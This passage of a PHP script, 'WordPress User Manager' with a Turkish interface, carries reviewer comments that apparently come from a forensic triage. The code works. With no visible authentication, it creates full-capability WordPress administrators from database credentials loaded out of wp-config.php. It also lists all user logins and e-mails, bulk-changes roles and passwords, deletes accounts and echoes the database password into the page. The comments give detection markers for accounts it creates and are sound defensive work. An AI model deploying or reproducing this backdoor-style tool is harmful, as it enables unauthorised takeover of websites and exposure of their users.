// Triage hints grounded in what this block writes: the new row's
// {prefix}capabilities blob is the explicit list below (not just the role
// name), user_level is 10, a user-settings-time row is created at the same
// moment as the account, and user_registered is date() on the web server
// (local time, with no GMT conversion). Correlate user_registered with
// access-log hits on this script.
if ($is_connected && $_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['add_admin'])) {
$user_login = trim($_POST['user_login']);
$user_email = trim($_POST['user_email']);
$display_name = trim($_POST['display_name']);
$user_pass = $_POST['user_pass'];
$prefix = getTablePrefix();
if (empty($user_login) || empty($user_email) || empty($user_pass)) {
$error = "Tüm alanlar zorunludur!";
$action = 'add_admin';
} else {
try {
// Refuse duplicates on login or e-mail (the only validation performed)
$stmt = $pdo->prepare("SELECT ID FROM {$prefix}users WHERE user_login = ? OR user_email = ?");
$stmt->execute([$user_login, $user_email]);
if ($stmt->fetch()) {
$error = "Bu kullanıcı adı veya e-posta zaten kullanılıyor!";
$action = 'add_admin';
} else {
// Insert the users row with a $P$ hash and a slugified nicename
$hashed_password = wp_hash_password($user_pass);
$user_registered = date('Y-m-d H:i:s');
$user_nicename = sanitize_user($user_login);
$stmt = $pdo->prepare("INSERT INTO {$prefix}users (user_login, user_pass, user_nicename, user_email, user_registered, display_name) VALUES (?, ?, ?, ?, ?, ?)");
$stmt->execute([$user_login, $hashed_password, $user_nicename, $user_email, $user_registered, $display_name]);
$user_id = $pdo->lastInsertId();
// Explicit capability list written into usermeta rather than just the role
// name. NOTE(review): this blob is a practical marker for accounts created
// by this script — verify against a clean install before relying on it.
$capabilities = [
'administrator' => true,
'activate_plugins' => true,
'delete_others_pages' => true,
'delete_others_posts' => true,
'delete_pages' => true,
'delete_posts' => true,
'delete_private_pages' => true,
'delete_private_posts' => true,
'delete_published_pages' => true,
'delete_published_posts' => true,
'edit_others_pages' => true,
'edit_others_posts' => true,
'edit_pages' => true,
'edit_posts' => true,
'edit_private_pages' => true,
'edit_private_posts' => true,
'edit_published_pages' => true,
'edit_published_posts' => true,
'manage_categories' => true,
'manage_links' => true,
'manage_options' => true,
'moderate_comments' => true,
'publish_pages' => true,
'publish_posts' => true,
'read' => true,
'read_private_pages' => true,
'read_private_posts' => true,
'unfiltered_html' => true,
'upload_files' => true,
'edit_files' => true,
'edit_theme_options' => true,
'install_plugins' => true,
'install_themes' => true,
'list_users' => true,
'manage_network' => true,
'promote_users' => true,
'remove_users' => true,
'switch_themes' => true,
'update_core' => true,
'update_plugins' => true,
'update_themes' => true,
'edit_dashboard' => true,
'customize' => true,
'delete_site' => true,
'export' => true,
'import' => true,
'create_users' => true,
'delete_users' => true,
'edit_users' => true,
];
$capabilities_serialized = serialize($capabilities);
$stmt = $pdo->prepare("INSERT INTO {$prefix}usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)");
$stmt->execute([$user_id, $prefix . 'capabilities', $capabilities_serialized]);
// Legacy user_level 10 (administrator)
$stmt = $pdo->prepare("INSERT INTO {$prefix}usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)");
$stmt->execute([$user_id, $prefix . 'user_level', 10]);
// user-settings / user-settings-time rows, written unconditionally at
// creation time (the latter carries the creation epoch)
$stmt = $pdo->prepare("INSERT INTO {$prefix}usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)");
$stmt->execute([$user_id, $prefix . 'user-settings', '']);
$stmt = $pdo->prepare("INSERT INTO {$prefix}usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)");
$stmt->execute([$user_id, $prefix . 'user-settings-time', time()]);
$success = "Yönetici başarıyla eklendi!";
$action = 'list';
}
} catch (PDOException $e) {
$error = "Yönetici eklenirken hata oluştu: " . $e->getMessage();
$action = 'add_admin';
}
}
}
// User listing for the default view: every account, newest ID first, with
// its role keys and an admin flag (one extra usermeta query per user, and
// isUserAdmin() repeats the getUserRoles() query). Exposes all logins and
// e-mail addresses to the anonymous client.
$users = [];
if ($is_connected) {
try {
$prefix = getTablePrefix();
$stmt = $pdo->query("SELECT ID, user_login, user_email, user_registered, display_name FROM {$prefix}users ORDER BY ID DESC");
$users = $stmt->fetchAll(PDO::FETCH_ASSOC);
foreach ($users as &$user) {
$user['roles'] = getUserRoles($pdo, $user['ID']);
$user['is_admin'] = isUserAdmin($pdo, $user['ID']);
}
unset($user);
} catch (PDOException $e) {
$error = "Kullanıcılar yüklenirken hata oluştu: " . $e->getMessage();
}
}
// Role pre-selected in the edit form: the first key of the capabilities
// row, or 'subscriber' when no user is loaded / the row is empty.
$current_role = 'subscriber';
if ($user && isset($user['ID'])) {
$roles = getUserRoles($pdo, $user['ID']);
if (!empty($roles)) {
$current_role = $roles[0];
}
}
?>
<!DOCTYPE html>
<html lang="tr">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>WordPress User Manager</title>
<style>
* {
margin: 0;
padding: 0;
box-sizing: border-box;
}
body {
font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, sans-serif;
background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
min-height: 100vh;
padding: 20px;
color: #333;
}
.container {
max-width: 1200px;
margin: 0 auto;
}
h1 {
color: #fff;
margin-bottom: 30px;
text-align: center;
font-size: 2.5em;
text-shadow: 2px 2px 4px rgba(0,0,0,0.2);
}
h2 {
color: #333;
margin-bottom: 20px;
font-size: 1.5em;
}
.card {
background: #fff;
border-radius: 10px;
padding: 30px;
box-shadow: 0 10px 30px rgba(0,0,0,0.2);
margin-bottom: 20px;
overflow-x: visible;
}
.form-group {
margin-bottom: 20px;
}
.form-group label {
display: block;
margin-bottom: 8px;
font-weight: 600;
color: #555;
}
.form-group input[type="text"],
.form-group input[type="email"],
.form-group input[type="password"],
.form-group select {
width: 100%;
padding: 12px;
border: 2px solid #e0e0e0;
border-radius: 5px;
font-size: 16px;
transition: border-color 0.3s;
}
.form-group input:focus,
.form-group select:focus {
outline: none;
border-color: #667eea;
}
.form-actions {
display: flex;
gap: 10px;
margin-top: 25px;
}
.btn {
padding: 12px 24px;
border: none;
border-radius: 5px;
font-size: 16px;
font-weight: 600;
cursor: pointer;
text-decoration: none;
display: inline-block;
transition: all 0.3s;
text-align: center;
}
.btn-primary {
background: #667eea;
color: #fff;
}
.btn-primary:hover {
background: #5568d3;
transform: translateY(-2px);
box-shadow: 0 5px 15px rgba(102, 126, 234, 0.4);
}
.btn-success {
background: #10b981;
color: #fff;
}
.btn-success:hover {
background: #059669;
transform: translateY(-2px);
box-shadow: 0 5px 15px rgba(16, 185, 129, 0.4);
}
.btn-danger {
background: #ef4444;
color: #fff;
}
.btn-danger:hover {
background: #dc2626;
transform: translateY(-2px);
box-shadow: 0 5px 15px rgba(239, 68, 68, 0.4);
}
.btn-secondary {
background: #6b7280;
color: #fff;
}
.btn-secondary:hover {
background: #4b5563;
transform: translateY(-2px);
box-shadow: 0 5px 15px rgba(107, 114, 128, 0.4);
}
.btn-sm {
padding: 6px 12px;
font-size: 14px;
}
.alert {
padding: 15px 20px;
border-radius: 5px;
margin-bottom: 20px;
font-weight: 500;
}
.alert-error {
background: #fee2e2;
color: #991b1b;
border-left: 4px solid #ef4444;
}
.alert-success {
background: #d1fae5;
color: #065f46;
border-left: 4px solid #10b981;
}
.header-actions {
display: flex;
gap: 10px;
margin-bottom: 20px;
justify-content: flex-end;
}
.table-wrapper {
overflow-x: auto;
overflow-y: visible;
margin-top: 20px;
width: 100%;
-webkit-overflow-scrolling: touch;
display: block;
}
.user-table {
width: 100%;
min-width: 1100px;
border-collapse: collapse;
background: #fff;
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
table-layout: auto;
}
.user-table thead {
background: #f3f4f6;
position: sticky;
top: 0;
z-index: 10;
}
/* Header cells: bold, left-aligned, no wrapping so column titles stay on one line. */
.user-table th {
padding: 15px 12px;
text-align: left;
font-weight: 600;
color: #374151;
border-bottom: 2px solid #e5e7eb;
white-space: nowrap;
}
/* Column 1 holds the row checkbox; columns 2-7 get fixed or bounded widths
   so the table keeps its shape regardless of cell content. */
.user-table th:first-child {
width: 40px;
text-align: center;
}
.user-table td:first-child {
text-align: center;
}
.user-table th:nth-child(2) {
width: 60px;
}
.user-table th:nth-child(3) {
min-width: 100px;
max-width: 120px;
}
.user-table th:nth-child(4) {
min-width: 120px;
max-width: 150px;
}
.user-table th:nth-child(5) {
min-width: 120px;
}
.user-table th:nth-child(6) {
min-width: 100px;
max-width: 120px;
}
.user-table th:nth-child(7) {
min-width: 150px;
white-space: nowrap;
}
.user-table th:last-child {
min-width: 180px;
white-space: nowrap;
}
.user-table td {
padding: 12px;
border-bottom: 1px solid #e5e7eb;
vertical-align: middle;
word-wrap: break-word;
}
/* Columns 3, 4 and 6 (username, e-mail, role) are clipped with an ellipsis
   instead of wrapping; column 7 (registration date) never wraps either. */
.user-table td:nth-child(3),
.user-table td:nth-child(4),
.user-table td:nth-child(6) {
font-size: 13px;
overflow: hidden;
text-overflow: ellipsis;
white-space: nowrap;
}
.user-table td:nth-child(7) {
white-space: nowrap;
font-size: 13px;
min-width: 150px;
}
.user-table td:last-child {
white-space: nowrap;
min-width: 180px;
}
.user-table tbody tr {
transition: background-color 0.2s;
}
.user-table tbody tr:hover {
background: #f9fafb;
}
.user-table tbody tr:last-child td {
border-bottom: none;
}
/* Per-row action buttons (last column) and the bulk-action bar above the table. */
.actions {
display: flex;
gap: 8px;
flex-wrap: nowrap;
white-space: nowrap;
}
.bulk-actions {
display: flex;
gap: 10px;
align-items: center;
margin-bottom: 15px;
padding: 15px;
background: #f9fafb;
border-radius: 5px;
}
.bulk-actions input[type="checkbox"] {
width: 18px;
height: 18px;
cursor: pointer;
}
.bulk-actions label {
margin: 0;
font-weight: 600;
cursor: pointer;
}
.select-all-checkbox {
margin-right: 10px;
}
/* Role badges: amber for administrator rows, blue for every other role. */
.badge {
display: inline-block;
padding: 4px 12px;
border-radius: 12px;
font-size: 12px;
font-weight: 600;
text-transform: uppercase;
}
.badge-admin {
background: #fef3c7;
color: #92400e;
}
.badge-user {
background: #dbeafe;
color: #1e40af;
}
/* Narrow screens: keep the table at a fixed minimum width and let the
   wrapper scroll horizontally instead of squeezing the columns. */
@media (max-width: 768px) {
.table-wrapper {
overflow-x: scroll;
}
.user-table {
font-size: 13px;
min-width: 1100px;
}
.user-table th,
.user-table td {
padding: 8px 6px;
}
.user-table th:nth-child(7),
.user-table td:nth-child(7) {
font-size: 11px;
}
.user-table th:last-child,
.user-table td:last-child {
font-size: 11px;
}
}
</style>
</head>
<body>
<?php
/*
 * Page body of the standalone "WordPress User Manager" script.
 *
 * Renders exactly one view, chosen from state computed earlier in the file
 * (not visible in this section): the database-credential form while
 * $is_connected is false, otherwise the add-admin form, the bulk-edit form,
 * the single-user edit form, or the user list, selected by $action. Every
 * view is a form that posts back to this same URL.
 *
 * NOTE(review): no authentication or capability check is visible in this
 * section before any of these views are rendered, and the script asks for
 * raw database credentials in the browser rather than relying on the
 * WordPress login. A browser-reachable page that can create administrators
 * from database credentials is high-risk; if it is found on a site, confirm
 * its provenance (who deployed it, when, from where) before trusting it.
 * None of the POST forms below carries a CSRF/nonce field either, so a
 * browser that has a session with this page could be made to submit them
 * from another origin.
 */
?>
<div class="container">
<h1>WordPress User Manager</h1>
<?php if ($error): ?>
<div class="alert alert-error"><?php echo htmlspecialchars($error); ?></div>
<?php endif; ?>
<?php if ($success): ?>
<div class="alert alert-success"><?php echo htmlspecialchars($success); ?></div>
<?php endif; ?>
<?php if (!$is_connected): ?>
<!-- Database Bağlantı Formu -->
<div class="card">
<h2>Database Bağlantı Bilgileri</h2>
<?php if (isset($_SESSION['wp_config_found']) && $_SESSION['wp_config_found']): ?>
<div class="alert alert-success" style="margin-bottom: 20px;">
✓ wp-config.php dosyası bulundu ve bilgiler otomatik yüklendi!
</div>
<?php endif; ?>
<form method="POST" action="">
<div class="form-group">
<label for="db_host">Database Host:</label>
<input type="text" id="db_host" name="db_host" value="<?php echo htmlspecialchars($db_config['host'] ?: 'localhost'); ?>" required>
</div>
<div class="form-group">
<label for="db_name">Database Adı:</label>
<input type="text" id="db_name" name="db_name" value="<?php echo htmlspecialchars($db_config['dbname']); ?>" required>
</div>
<div class="form-group">
<label for="db_user">Database Kullanıcı Adı:</label>
<input type="text" id="db_user" name="db_user" value="<?php echo htmlspecialchars($db_config['username']); ?>" required>
</div>
<div class="form-group">
<label for="db_pass">Database Şifresi:</label>
<?php /* NOTE(review): whatever $db_config['password'] holds is written into the response
   as the input's value, so the database password is readable in the page source, in
   browser devtools and by any proxy or cache that sees the HTML. Emitting an empty
   value and re-prompting would avoid the disclosure. */ ?>
<input type="password" id="db_pass" name="db_pass" value="<?php echo htmlspecialchars($db_config['password']); ?>">
</div>
<div class="form-group">
<label for="db_prefix">Tablo Prefix:</label>
<input type="text" id="db_prefix" name="db_prefix" value="<?php echo htmlspecialchars($db_config['prefix'] ?: 'wp_'); ?>" required>
</div>
<button type="submit" name="connect" class="btn btn-primary">Bağlan</button>
</form>
</div>
<?php elseif ($action === 'add_admin'): ?>
<!-- Yönetici Ekleme Formu -->
<div class="card">
<h2>Yönetici Ekle</h2>
<?php /* Previously posted values are reflected into the inputs so a failed submission
   keeps what the operator typed; each one goes through htmlspecialchars() first. */ ?>
<form method="POST" action="">
<div class="form-group">
<label for="user_login">Kullanıcı Adı:</label>
<input type="text" id="user_login" name="user_login" value="<?php echo isset($_POST['user_login']) ? htmlspecialchars($_POST['user_login']) : ''; ?>" required>
</div>
<div class="form-group">
<label for="user_email">E-posta:</label>
<input type="email" id="user_email" name="user_email" value="<?php echo isset($_POST['user_email']) ? htmlspecialchars($_POST['user_email']) : ''; ?>" required>
</div>
<div class="form-group">
<label for="display_name">Ad Soyad:</label>
<input type="text" id="display_name" name="display_name" value="<?php echo isset($_POST['display_name']) ? htmlspecialchars($_POST['display_name']) : ''; ?>">
</div>
<div class="form-group">
<label for="user_pass">Şifre:</label>
<input type="password" id="user_pass" name="user_pass" required>
</div>
<div class="form-actions">
<button type="submit" name="add_admin" class="btn btn-success">Yönetici Ekle</button>
<a href="?action=list" class="btn btn-secondary">İptal</a>
</div>
</form>
</div>
<?php elseif ($action === 'bulk_edit' && !empty($_SESSION['bulk_edit_users'])): ?>
<!-- Toplu Düzenleme Formu -->
<?php /* The set of users being edited lives in $_SESSION['bulk_edit_users'] (filled by the
   bulk_edit POST handled earlier in the file); only its size is shown here. An empty
   role or password field means "leave unchanged" according to the labels below. */ ?>
<div class="card">
<h2>Seçilen Kullanıcıları Düzenle (<?php echo count($_SESSION['bulk_edit_users']); ?>)</h2>
<form method="POST" action="">
<div class="form-group">
<label for="user_role">Rol Değiştir (Boş bırakırsanız değişmez):</label>
<select id="user_role" name="user_role">
<option value="">Rol Değiştirme</option>
<option value="subscriber">Abone</option>
<option value="contributor">Katkıda Bulunan</option>
<option value="author">Yazar</option>
<option value="editor">Editör</option>
<option value="administrator">Yönetici</option>
</select>
</div>
<div class="form-group">
<label for="user_pass">Şifre Değiştir (Tüm seçili kullanıcılar için aynı şifre, boş bırakırsanız değişmez):</label>
<input type="password" id="user_pass" name="user_pass" placeholder="Yeni şifre">
</div>
<div class="form-actions">
<button type="submit" name="bulk_update" class="btn btn-primary">Güncelle</button>
<a href="?action=list" class="btn btn-secondary">İptal</a>
</div>
</form>
</div>
<?php elseif ($action === 'edit' && $user): ?>
<!-- Kullanıcı Düzenleme Formu -->
<div class="card">
<h2>Kullanıcı Düzenle</h2>
<form method="POST" action="">
<?php /* $user['ID'] is echoed raw here, unlike the other $user fields in this form and the
   ID cell in the list below; escaping it (or casting to int) keeps every reflected
   value on one rule instead of depending on where the row came from. */ ?>
<input type="hidden" name="user_id" value="<?php echo $user['ID']; ?>">
<div class="form-group">
<label for="user_login">Kullanıcı Adı:</label>
<input type="text" id="user_login" name="user_login" value="<?php echo htmlspecialchars($user['user_login']); ?>" required>
</div>
<div class="form-group">
<label for="user_email">E-posta:</label>
<input type="email" id="user_email" name="user_email" value="<?php echo htmlspecialchars($user['user_email']); ?>" required>
</div>
<div class="form-group">
<label for="display_name">Ad Soyad:</label>
<input type="text" id="display_name" name="display_name" value="<?php echo htmlspecialchars($user['display_name']); ?>">
</div>
<div class="form-group">
<label for="user_pass">Yeni Şifre (Değiştirmek istemiyorsanız boş bırakın):</label>
<input type="password" id="user_pass" name="user_pass" placeholder="Yeni şifre">
</div>
<div class="form-group">
<label for="user_role">Rol:</label>
<?php /* $current_role is computed earlier in the file; the option matching it is preselected. */ ?>
<select id="user_role" name="user_role" required>
<option value="subscriber" <?php echo $current_role === 'subscriber' ? 'selected' : ''; ?>>Abone</option>
<option value="contributor" <?php echo $current_role === 'contributor' ? 'selected' : ''; ?>>Katkıda Bulunan</option>
<option value="author" <?php echo $current_role === 'author' ? 'selected' : ''; ?>>Yazar</option>
<option value="editor" <?php echo $current_role === 'editor' ? 'selected' : ''; ?>>Editör</option>
<option value="administrator" <?php echo $current_role === 'administrator' ? 'selected' : ''; ?>>Yönetici</option>
</select>
</div>
<div class="form-actions">
<button type="submit" name="update_user" class="btn btn-primary">Güncelle</button>
<a href="?action=list" class="btn btn-secondary">İptal</a>
</div>
</form>
</div>
<?php else: ?>
<!-- Kullanıcı Listesi -->
<div class="header-actions">
<a href="?action=add_admin" class="btn btn-success">Yönetici Ekle</a>
<a href="?disconnect=1" class="btn btn-secondary">Bağlantıyı Kes</a>
</div>
<div class="card">
<h2>Kullanıcılar (<?php echo count($users); ?>)</h2>
<?php if (empty($users)): ?>
<div style="text-align: center; padding: 40px; color: #6b7280;">
<p style="font-size: 18px; margin-bottom: 10px;">Henüz kullanıcı bulunmuyor.</p>
<a href="?action=add_admin" class="btn btn-success" style="margin-top: 10px;">İlk Kullanıcıyı Ekle</a>
</div>
<?php else: ?>
<?php /* #bulkForm wraps the whole table. The buttons in .bulk-actions are type="button";
   the JavaScript further down appends a hidden bulk_edit / bulk_delete marker and
   then calls submit(), so selected_users[] travels with either action. */ ?>
<form method="POST" id="bulkForm">
<div class="bulk-actions">
<input type="checkbox" id="selectAll" class="select-all-checkbox" onchange="toggleAll(this)">
<label for="selectAll">Tümünü Seç</label>
<button type="button" class="btn btn-primary" id="bulkEditBtn" disabled onclick="handleBulkEdit()">Seçilenleri Düzenle</button>
<button type="button" class="btn btn-danger" id="bulkDeleteBtn" disabled onclick="handleBulkDelete()">Seçilenleri Sil</button>
<span id="selectedCount" style="margin-left: 10px; color: #6b7280; font-weight: 500;"></span>
</div>
<div class="table-wrapper">
<table class="user-table">
<thead>
<tr>
<th><input type="checkbox" id="selectAllHeader" onchange="toggleAll(this)"></th>
<th>ID</th>
<th>Kullanıcı Adı</th>
<th>E-posta</th>
<th>Ad Soyad</th>
<th>Rol</th>
<th>Kayıt Tarihi</th>
<th>İşlemler</th>
</tr>
</thead>
<tbody>
<?php foreach ($users as $u): ?>
<tr>
<?php /* $u['ID'] is echoed raw into the checkbox value but escaped in the next cell; one rule
   for both would be simpler to audit. */ ?>
<td><input type="checkbox" name="selected_users[]" value="<?php echo $u['ID']; ?>" class="user-checkbox" onchange="updateBulkActions()"></td>
<td><?php echo htmlspecialchars($u['ID']); ?></td>
<td><?php echo htmlspecialchars($u['user_login']); ?></td>
<td><?php echo htmlspecialchars($u['user_email']); ?></td>
<td><?php echo htmlspecialchars($u['display_name'] ?: '-'); ?></td>
<td>
<?php
// Role badge: amber when the row was flagged is_admin upstream, blue otherwise;
// rows without any role get a generic "Kullanıcı" badge.
if (!empty($u['roles'])) {
echo '<span class="badge ' . ($u['is_admin'] ? 'badge-admin' : 'badge-user') . '">';
echo htmlspecialchars(implode(', ', $u['roles']));
echo '</span>';
} else {
echo '<span class="badge badge-user">Kullanıcı</span>';
}
?>
</td>
<td><?php
// Registration date, or '-' for the MySQL zero date.
// NOTE(review): strtotime() returns false for an unparsable value, which date() then
// formats as the Unix epoch (or rejects with a TypeError under strict_types) rather
// than falling through to '-'.
if (!empty($u['user_registered']) && $u['user_registered'] !== '0000-00-00 00:00:00') {
echo date('d.m.Y H:i', strtotime($u['user_registered']));
} else {
echo '-';
}
?></td>
<td class="actions">
<?php /* NOTE(review): this <form> is opened while #bulkForm (above) is still open. HTML
   parsers ignore a nested <form> start tag, so in the browser this is not a separate
   form: the onsubmit confirm() is dropped, the "Sil" button submits #bulkForm with
   delete_user set, and every row's hidden user_id is sent along — PHP keeps only the
   last repeated user_id. Which user the server-side handler (not visible here) then
   deletes does not follow from the row that was clicked. Moving the per-row form out
   of the table, or tying the button and hidden input to their own form via the
   form="…" attribute, would make each row submit on its own. */ ?>
<form method="POST" style="display:inline;" onsubmit="return confirm('Bu kullanıcıyı silmek istediğinizden emin misiniz?');">
<input type="hidden" name="user_id" value="<?php echo $u['ID']; ?>">
<button type="submit" name="delete_user" class="btn btn-sm btn-danger">Sil</button>
</form>
</td>
</tr>
<?php endforeach; ?>
</tbody>
</table>
</div>
</form>
<?php endif; ?>
</div>
<?php endif; ?>
</div>
<script>
/**
 * Copy the state of a "select all" checkbox onto every row checkbox,
 * then refresh the bulk-action buttons and the selection counter.
 *
 * Wired to both #selectAll and #selectAllHeader via their onchange attributes.
 *
 * @param {HTMLInputElement} checkbox - the master checkbox that just changed
 */
function toggleAll(checkbox) {
    const wanted = checkbox.checked;
    for (const rowBox of document.querySelectorAll('.user-checkbox')) {
        rowBox.checked = wanted;
    }
    updateBulkActions();
}
/**
 * Sync the bulk-action UI with the current row selection.
 *
 * Enables #bulkEditBtn / #bulkDeleteBtn and fills #selectedCount whenever at
 * least one .user-checkbox is ticked, clears them otherwise, and sets the two
 * "select all" boxes to checked only when every row box is checked.
 *
 * The buttons and counter are looked up by id without a null check; the two
 * "select all" boxes are guarded because only the header one exists inside
 * the table.
 */
function updateBulkActions() {
    const rowBoxes = Array.from(document.querySelectorAll('.user-checkbox'));
    const selected = rowBoxes.filter(cb => cb.checked).length;
    const deleteBtn = document.getElementById('bulkDeleteBtn');
    const editBtn = document.getElementById('bulkEditBtn');
    const counter = document.getElementById('selectedCount');
    const masterBox = document.getElementById('selectAll');
    const headerBox = document.getElementById('selectAllHeader');

    const nothingSelected = selected === 0;
    deleteBtn.disabled = nothingSelected;
    editBtn.disabled = nothingSelected;
    counter.textContent = nothingSelected ? '' : selected + ' kullanıcı seçildi';

    // Keep both "select all" boxes in step with the rows.
    const allSelected = rowBoxes.length > 0 && rowBoxes.every(cb => cb.checked);
    if (masterBox) masterBox.checked = allSelected;
    if (headerBox) headerBox.checked = allSelected;
}
/**
 * Submit #bulkForm with a hidden bulk_edit=1 marker so the server treats the
 * checked selected_users[] as the set to edit.
 *
 * Does nothing but alert when no row is selected. Uses form.submit(), which
 * does not fire submit event handlers.
 */
function handleBulkEdit() {
    const anySelected = document.querySelectorAll('.user-checkbox:checked').length > 0;
    if (!anySelected) {
        alert('Lütfen en az bir kullanıcı seçin!');
        return;
    }
    const bulkForm = document.getElementById('bulkForm');
    const marker = Object.assign(document.createElement('input'), {
        type: 'hidden',
        name: 'bulk_edit',
        value: '1',
    });
    bulkForm.appendChild(marker);
    bulkForm.submit();
}
/**
 * Submit #bulkForm with a hidden bulk_delete=1 marker after a confirm() prompt,
 * so the server deletes the checked selected_users[].
 *
 * Alerts and returns when no row is selected; returns silently when the
 * confirmation is declined. Uses form.submit(), which does not fire submit
 * event handlers.
 */
function handleBulkDelete() {
    const anySelected = document.querySelectorAll('.user-checkbox:checked').length > 0;
    if (!anySelected) {
        alert('Lütfen en az bir kullanıcı seçin!');
        return;
    }
    if (!confirm('Seçili kullanıcıları silmek istediğinizden emin misiniz?')) {
        return;
    }
    const bulkForm = document.getElementById('bulkForm');
    const marker = Object.assign(document.createElement('input'), {
        type: 'hidden',
        name: 'bulk_delete',
        value: '1',
    });
    bulkForm.appendChild(marker);
    bulkForm.submit();
}
// On page load: put the bulk-action buttons and counter into their initial
// state (the browser may restore checkbox ticks from a previous visit).
document.addEventListener('DOMContentLoaded', () => {
    updateBulkActions();
});
</script>
</body>
</html>